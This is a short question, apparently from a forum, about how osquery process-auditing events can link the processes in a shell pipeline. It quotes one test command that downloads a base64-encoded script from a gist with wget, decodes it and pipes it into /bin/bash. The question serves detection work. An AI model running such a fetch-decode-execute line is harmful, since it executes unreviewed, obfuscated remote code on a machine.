Osquery isn't behaving the way I (naively?) expected it to. I'm testing this command: wget -q -O- https://gist.githubusercontent.com/keepwatch/758bdc149bd9e96930ff167a94a02850/raw/e891e9c7e84052e2cb1df03b84202cc316c71407/logb.txt | base64 -d | /bin/bash I was hoping to have some way to relate the initial and piped processes - wget, base64, and the second bash shell (executes the script). However, the process auditing events I received all have the same parent (the original bash shell where I ran this command), and I don't see any fields containing my pipe-separated command line (just the cmdline for each process). Are there any other ways (beyond time correlation) to determine that these processes are intimately related?